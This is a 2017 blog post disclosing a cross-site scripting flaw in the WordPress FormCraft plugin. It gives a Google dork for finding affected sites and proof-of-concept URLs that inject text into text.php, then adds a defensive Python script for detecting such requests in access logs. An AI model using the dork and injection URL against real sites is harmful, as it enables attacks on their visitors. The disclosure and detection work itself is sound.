Tuesday, December 19, 2017

WordPress Plugins FormCraft - Cross-Site Scripting Image Type

 Hello Fazlast Back, Share Tutorials Again :)
# Exploit Title: WordPress Plugins FormCraft - Cross-Site Scripting Image Type
# Google Dork: inurl:/wp-content/plugins/formcraft/
# Date: 15 December 2017 (Indonesia)
# Exploit Author: AlHikam0x
# Tested on: Ubuntu

Proof of Concept

Check for a blank page: https://web-target/wp-content/plugins/formcraft/php/text.php
Exploit XSS: append ?text=XSS Vulnerability&bg=white&text_color=black to that URL

View image : https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzaR6S0a7ngfAtUUsPdJyt2lslW7Zfh7Z2KLB21RZK9JTs0Y084N5Ibn9vdeDTdKjva0PzSgnUWMJscD-ymoLMspsKVnVHMvWkSADGHg8uE2IqKJSv-eY6ra5odDjAP4JuDKivwfIlL3o/s1600/Screenshot+from+2017-12-15+03-43-22.png

Finish: https://web-target/wp-content/plugins/formcraft/php/text.php?text=qh3xu&bg=white&text_color=black
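
For site owners, one way to find requests like the PoC above in a web server access log. This is an added example, not part of the original post or the plugin's code. It assumes the Apache/nginx "combined" log format; the function name, the `own_host` parameter and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Path and parameter names come from the PoC URL in the post.
TARGET_PATH = "/wp-content/plugins/formcraft/php/text.php"
POC_PARAMS = ("text", "bg", "text_color")

# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "[^"]*")?'
)

def find_text_php_hits(lines, own_host):
    """Return one dict per logged request that passes a `text` value to text.php."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        if not url.path.lower().endswith(TARGET_PATH):
            continue  # endswith() also covers WordPress installed in a subdirectory
        query = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        if "text" not in query:
            continue  # bare request, i.e. the "blank page" check
        ref_host = urlsplit(m["referer"] or "").hostname
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "status": int(m["status"]),
            "text": query["text"][0],
            "params": sorted(p for p in POC_PARAMS if p in query),
            # True when the link was followed from a page on another host.
            "external_referer": ref_host is not None and ref_host != own_host,
        })
    return hits

# Constructed sample lines (documentation IP ranges and hosts, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Dec/2017:03:43:22 +0700] "GET /wp-content/plugins/formcraft/php/text.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Dec/2017:03:44:01 +0700] "GET /wp-content/plugins/formcraft/php/text.php?text=XSS%20Vulnerability&bg=white&text_color=black HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '198.51.100.24 - - [15/Dec/2017:09:10:45 +0700] "GET /wp-content/plugins/formcraft/php/text.php?text=qh3xu&bg=white&text_color=black HTTP/1.1" 200 1602 "https://forum.example.net/t/123" "Mozilla/5.0"',
    '198.51.100.24 - - [15/Dec/2017:09:11:02 +0700] "GET /wp-login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_text_php_hits(SAMPLE_LOG, "blog.example.org"):
        print(hit)
```

Hits with `external_referer` set are the ones worth reviewing first, since they show the crafted link being followed from another site.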
Thanks :)

